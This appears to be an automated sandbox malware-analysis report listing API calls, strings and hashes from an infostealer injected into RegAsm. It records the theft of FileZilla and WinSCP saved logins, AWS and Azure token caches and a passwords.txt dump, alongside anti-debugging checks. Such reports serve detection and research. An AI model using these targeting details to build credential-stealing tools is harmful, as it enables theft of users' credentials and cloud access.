                                                    • Source File: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                    • String ID:
                                                    • API String ID: 3475089800-0
                                                    • Opcode ID: 9e27f4d2e78b9922c53b1e56cabc765231966745f237afc57087c3c9140e9a1c
                                                    • Instruction ID: 73016c1f4bcc037d73c6e80afde5f095d9ed6cd87135849951a3ce3e1026e115
                                                    • Opcode Fuzzy Hash: 9e27f4d2e78b9922c53b1e56cabc765231966745f237afc57087c3c9140e9a1c
                                                    • Instruction Fuzzy Hash: ED5181B6A04205DBEF00DFA5CC80AEE77B8BF04714F514569E505EF240EB75A564FB60
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004137F8
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 0041380B
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0041381F
                                                    • StrCmpCA.SHLWAPI(?,0041136D), ref: 00413833
                                                    • CloseHandle.KERNEL32(00000000), ref: 00413850
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 420147892-0
                                                    • Opcode ID: e2cf7e779634c82798d1ab7fc4ecbbe8b45b50fd72aeb002bd9fe8f8be4b5c7f
                                                    • Instruction ID: 3056cab4e8f92392e2f21ee4b583b1a296e2112487504496f7e9dd1b11d1fd51
                                                    • Opcode Fuzzy Hash: e2cf7e779634c82798d1ab7fc4ecbbe8b45b50fd72aeb002bd9fe8f8be4b5c7f
                                                    • Instruction Fuzzy Hash: 50116D75A00219EFDB11DF95CC49BEEBBF8FB05751F10426AF505A22A0D7349B80CBA5
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 1FBC48A7
                                                    • IsDebuggerPresent.KERNEL32 ref: 1FBC4973
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1FBC4993
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 1FBC499D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: ad2f19eb3bb0fa4f7d4bba86a357567e678c51ca99c1e52faad8409d99c5e144
                                                    • Instruction ID: 9e338ddf203bb5de2c00f16f2351c8f15fba8097a37c29626a43bba76e58c4c9
                                                    • Opcode Fuzzy Hash: ad2f19eb3bb0fa4f7d4bba86a357567e678c51ca99c1e52faad8409d99c5e144
                                                    • Instruction Fuzzy Hash: D4312675D05329DBDB20DFA5D9897CDBBF8EF08700F1041EAE508AB240EB799A859F05
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                    • Instruction ID: 9a6db0e7bfc843b2a074a4be52e26480c3007121c6845a363f1912d8476b8811
                                                    • Opcode Fuzzy Hash: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                    • Instruction Fuzzy Hash: 561108319046926BD3128B28D980F46F7E4BF44324F054764FD499BE50DB2EF860C7E1
                                                    APIs
                                                    • CryptBinaryToStringA.CRYPT32(00000000,00404E7F,40000001,00000000,00000000), ref: 0041304A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptString
                                                    • String ID:
                                                    • API String ID: 80407269-0
                                                    • Opcode ID: 0c3d2575f66ef3617d3b150568e86f21a4475e45e20c070a860bd0a5cc44e0b9
                                                    • Instruction ID: ebb07d4d2038599017bd7936e312b347f00f81c902c408717c114f30d6bde88e
                                                    • Opcode Fuzzy Hash: 0c3d2575f66ef3617d3b150568e86f21a4475e45e20c070a860bd0a5cc44e0b9
                                                    • Instruction Fuzzy Hash: 0B110235100208FFCF019FA0EC44BEA3FE6BF4A346F005055FA198B261C73A9AE5AB15
                                                    APIs
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407DE6
                                                    • LocalAlloc.KERNEL32(00000040,00406095,?,?,00406095,00000000,?), ref: 00407DF7
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407E1D
                                                    • LocalFree.KERNEL32(00000000,?,?,00406095,00000000,?), ref: 00407E31
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                    • String ID:
                                                    • API String ID: 4291131564-0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Strings
                                                    • INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1FAC597E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
                                                    • API String ID: 0-143322027
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    • strtok_s.MSVCRT ref: 0040F5B2
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00425200,00425200,00425200,00425200), ref: 0040F5F8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F5FF
                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040F61A
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F627
                                                      • Part of subcall function 004136CE: malloc.MSVCRT ref: 004136D5
                                                      • Part of subcall function 004136CE: strncpy.MSVCRT ref: 004136EB
                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040F661
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F66E
                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040F6A8
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F6B5
                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040F6EF
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F700
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F78B
                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0040F7A3
                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0040F7BB
                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0040F7D3
                                                    • lstrcatA.KERNEL32(?,Soft: FileZilla,?,?,00000000), ref: 0040F7EA
                                                    • lstrcatA.KERNEL32(?,Host: ,?,?,00000000), ref: 0040F7F8
                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 0040F80A
                                                    • lstrcatA.KERNEL32(?,00428E9C,?,?,00000000), ref: 0040F818
                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 0040F82A
                                                    • lstrcatA.KERNEL32(?,00428E48,?,?,00000000), ref: 0040F838
                                                    • lstrcatA.KERNEL32(?,Login: ,?,?,00000000), ref: 0040F846
                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 0040F858
                                                    • lstrcatA.KERNEL32(?,00428E48,?,?,00000000), ref: 0040F866
                                                    • lstrcatA.KERNEL32(?,Password: ,?,?,00000000), ref: 0040F874
                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 0040F886
                                                    • lstrcatA.KERNEL32(?,00428E48,?,?,00000000), ref: 0040F894
                                                    • lstrcatA.KERNEL32(?,00428E48,?,?,00000000), ref: 0040F8A2
                                                    • strtok_s.MSVCRT ref: 0040F8E6
                                                    • lstrlenA.KERNEL32(?), ref: 0040F8F9
                                                    • memset.MSVCRT ref: 0040F945
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                    • API String ID: 337689325-935134978
                                                    APIs
                                                    • memset.MSVCRT ref: 0040EEEE
                                                    • memset.MSVCRT ref: 0040EF12
                                                    • memset.MSVCRT ref: 0040EF2F
                                                    • memset.MSVCRT ref: 0040EF4C
                                                    • memset.MSVCRT ref: 0040EF62
                                                    • memset.MSVCRT ref: 0040EF78
                                                    • memset.MSVCRT ref: 0040EF8E
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040EFC3
                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,0041990E), ref: 0040EFF6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: memset$OpenValue
                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                    • API String ID: 1966332187-2798830873
                                                    • Opcode ID: 55e65f1442cb9368854d78b89c2310ca7c47ee3b8afe95571b1dd498a69119b2
                                                    • Instruction ID: c46821c6dde54d7fdc4e97e9647d6a3cfef6248c0bb444e840b6e235717427d9
                                                    • Opcode Fuzzy Hash: 55e65f1442cb9368854d78b89c2310ca7c47ee3b8afe95571b1dd498a69119b2
                                                    • Instruction Fuzzy Hash: BEF10171900219AADB20EB91DC56FEE7778AF14305F5000BBF605B61E1DB786B88CF69
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00000000,?,004251E8,00000000,?,?,00425200), ref: 0040ADA3
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040ADBF
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040ADCA
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040ADDC
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040ADE7
                                                    • ReadFile.KERNEL32(00000000,?,00000000,0040BF1B,00000000), ref: 0040AE05
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040AE12
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040AE19
                                                    • StrStrA.SHLWAPI(?), ref: 0040AE2B
                                                    • StrStrA.SHLWAPI(00000000), ref: 0040AE50
                                                    • lstrcatA.KERNEL32(?), ref: 0040AE6B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AE7D
                                                    • lstrcatA.KERNEL32(?,00428E50), ref: 0040AE8B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AE9D
                                                    • lstrcatA.KERNEL32(?,00428E4C), ref: 0040AEAB
                                                    • lstrcatA.KERNEL32(?), ref: 0040AEBA
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AEC6
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040AED4
                                                    • StrStrA.SHLWAPI(?), ref: 0040AEE5
                                                    • StrStrA.SHLWAPI(00000000), ref: 0040AEFA
                                                    • lstrcatA.KERNEL32(?), ref: 0040AF15
                                                      • Part of subcall function 0040AB80: memset.MSVCRT ref: 0040ABB0
                                                      • Part of subcall function 0040AB80: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,?,?,0040AF23,00000000), ref: 0040ABCC
                                                      • Part of subcall function 0040AB80: CryptStringToBinaryA.CRYPT32(?,00000000,?,?,0040AF23,00000000), ref: 0040ABD6
                                                      • Part of subcall function 0040AB80: memcpy.MSVCRT ref: 0040AC63
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AF28
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040AF36
                                                    • StrStrA.SHLWAPI(?), ref: 0040AF47
                                                    • StrStrA.SHLWAPI(00000000), ref: 0040AF5C
                                                    • lstrcatA.KERNEL32(?), ref: 0040AF77
                                                      • Part of subcall function 0040AB80: lstrcatA.KERNEL32(?,00425200), ref: 0040AC92
                                                      • Part of subcall function 0040AB80: lstrcatA.KERNEL32(?,00425200), ref: 0040ACA5
                                                      • Part of subcall function 0040AB80: lstrcatA.KERNEL32(?,00425200), ref: 0040ACC2
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AF8A
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040AF98
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040AFA6
                                                    • lstrlenA.KERNEL32(?), ref: 0040AFC2
                                                    • memset.MSVCRT ref: 0040B008
                                                    • CloseHandle.KERNEL32(?), ref: 0040B013
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointermemset$AllocBinaryCloseCreateCryptHandleProcessReadSizeStringmemcpy
                                                    • String ID: $passwords.txt
                                                    • API String ID: 1130354886-2417084464
                                                    • Opcode ID: e27dee67eaa8137fc15ce88d99f898602aeff498da795228a011ab0127cd3bad
                                                    • Instruction ID: 519638182b9b54bea7e777a7a648870d54dc9fa6b37f4d80f0e6037969fabad9
                                                    • Opcode Fuzzy Hash: e27dee67eaa8137fc15ce88d99f898602aeff498da795228a011ab0127cd3bad
                                                    • Instruction Fuzzy Hash: 55A10676900208AFDF01AFA0ED4ABEDBBB6FF09305F245029F512B61B1DB395954CB54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
                                                    • API String ID: 0-209218429
                                                    • Opcode ID: 3826e9e0a1bcedf2d2f60d3264cec2b77d09fbc0d7c788dc3c2ba60ab7e08ed0
                                                    • Instruction ID: 2aff467a436456621409fc131d36307e609bf89deefbcd4b6440d31983bb1c6e
                                                    • Opcode Fuzzy Hash: 3826e9e0a1bcedf2d2f60d3264cec2b77d09fbc0d7c788dc3c2ba60ab7e08ed0
                                                    • Instruction Fuzzy Hash: AAF115746043029FC710DF25D980A9BBBF9FF84324F440468EE4A87651E73AF965DB62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
                                                    • API String ID: 0-1613945299
                                                    • Opcode ID: 2463e0c013310215f74e434b83c338f36d8f8e0f817db248ca7f9b33245b1872
                                                    • Instruction ID: 08ef06fc8a6d7e135f3192e10843e7f0335c3cc2ccce31f1b4d48e89d4772675
                                                    • Opcode Fuzzy Hash: 2463e0c013310215f74e434b83c338f36d8f8e0f817db248ca7f9b33245b1872
                                                    • Instruction Fuzzy Hash: 2DF104B5E08741AFD300CB64CD55F5FB7EABF89304F584A1DF88496241E63DEA4887A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,%s$CREATE TABLE x(_shape$_node
                                                    • API String ID: 0-1242591684
                                                    • Opcode ID: aecde35de967021b1f0f1611d6a92669721ad76f33ceaa8a334f1d920d0911e4
                                                    • Instruction ID: 3e0f0ebd32269207a75d13695ddcd4c4952cbd89fbc5346ba0f7b96afe9518ba
                                                    • Opcode Fuzzy Hash: aecde35de967021b1f0f1611d6a92669721ad76f33ceaa8a334f1d920d0911e4
                                                    • Instruction Fuzzy Hash: 44C1F1B56043029BDB108F25CD84B977BF9FF48728F040168EA4A86752E73EF525DBA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                    • API String ID: 0-900822179
                                                    • Opcode ID: 85f0452e75a2f3d531b6b473b9f52537f56758a7586ee4ab33b74646c775f4f4
                                                    • Instruction ID: f8352a5696620f11f58705d55f474a780b759fa8f2311a5adb6102bca0f66d4c
                                                    • Opcode Fuzzy Hash: 85f0452e75a2f3d531b6b473b9f52537f56758a7586ee4ab33b74646c775f4f4
                                                    • Instruction Fuzzy Hash: 93911A759083059BCB00DF14D840BAB77E5FF41304F498A4DFAA58B296DB3AE5468BA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                    • API String ID: 0-449611708
                                                    • Opcode ID: 92d7eafd0aa0307798801852d9d4d862fb80d3b81f40b05bec9504d6b7607d4e
                                                    • Instruction ID: 54b11be8d344b4642373a1467e0098964840412834b829edbea11fcaa6270ba2
                                                    • Opcode Fuzzy Hash: 92d7eafd0aa0307798801852d9d4d862fb80d3b81f40b05bec9504d6b7607d4e
                                                    • Instruction Fuzzy Hash: 6B516BB4F94316A7E7105A65AED0FDB76E46F0072AF000074FE48A6342F76DF21992E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                    • API String ID: 0-2933911573
                                                    • Opcode ID: 8c26c0517612a78bc644d8e6f419305a33400e51cc59885e25158f41eb7849a6
                                                    • Instruction ID: 75764fbc989619376f4f310db7147773a7c4721918ffcd51193eedd84fdd8d8a
                                                    • Opcode Fuzzy Hash: 8c26c0517612a78bc644d8e6f419305a33400e51cc59885e25158f41eb7849a6
                                                    • Instruction Fuzzy Hash: F4A15C75A043025FE7009B25AC81BFA7796DF45321F4801A9ED849A282F66FF12FD7B1
                                                    APIs
                                                    • memset.MSVCRT ref: 00417CAA
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00417CD1
                                                    • lstrcatA.KERNEL32(?,\.azure\), ref: 00417CEE
                                                      • Part of subcall function 004177D3: wsprintfA.USER32 ref: 004177EB
                                                      • Part of subcall function 004177D3: FindFirstFileA.KERNEL32(?,?), ref: 00417802
                                                    • memset.MSVCRT ref: 00417D2E
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00417D55
                                                    • lstrcatA.KERNEL32(?,\.aws\), ref: 00417D72
                                                      • Part of subcall function 004177D3: StrCmpCA.SHLWAPI(?,00425240), ref: 00417830
                                                      • Part of subcall function 004177D3: StrCmpCA.SHLWAPI(?,0042523C), ref: 00417846
                                                      • Part of subcall function 004177D3: FindNextFileA.KERNEL32(000000FF,?), ref: 00417AE3
                                                      • Part of subcall function 004177D3: FindClose.KERNEL32(000000FF), ref: 00417AF7
                                                    • memset.MSVCRT ref: 00417DB2
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00417DD9
                                                    • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00417DF6
                                                      • Part of subcall function 004177D3: wsprintfA.USER32 ref: 0041786B
                                                      • Part of subcall function 004177D3: StrCmpCA.SHLWAPI(?,00425200), ref: 0041787C
                                                      • Part of subcall function 004177D3: wsprintfA.USER32 ref: 00417899
                                                      • Part of subcall function 004177D3: PathMatchSpecA.SHLWAPI(?,?), ref: 004178CD
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,?,000003E8), ref: 004178F9
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,004251E8), ref: 0041790B
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,?), ref: 0041791B
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,004251E8), ref: 0041792D
                                                      • Part of subcall function 004177D3: lstrcatA.KERNEL32(?,?), ref: 00417941
                                                    • memset.MSVCRT ref: 00417E36
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$memset$Findwsprintf$FilePath$CloseFirstFolderMatchNextSpec
                                                    • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                    • API String ID: 2615841231-3645552435
                                                    • Opcode ID: c9212e5bd4e93b1b70415a919767144b0d01044981f7da6fa5772f24a78b3fc4
                                                    • Instruction ID: 1dd8a78ca5992b47dd81bcaa515727beb3a1476bc257dfe9c218185c4bfeef7c
                                                    • Opcode Fuzzy Hash: c9212e5bd4e93b1b70415a919767144b0d01044981f7da6fa5772f24a78b3fc4
                                                    • Instruction Fuzzy Hash: 904165B6A44228ABDF00EBB1EC47FC977AC5B64704F500067B649E60D0EEB896C48B65
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040B277
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040B27E
                                                    • lstrcatA.KERNEL32(?,00000000,00428E58,00428E58,00000000), ref: 0040B3A4
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B3B2
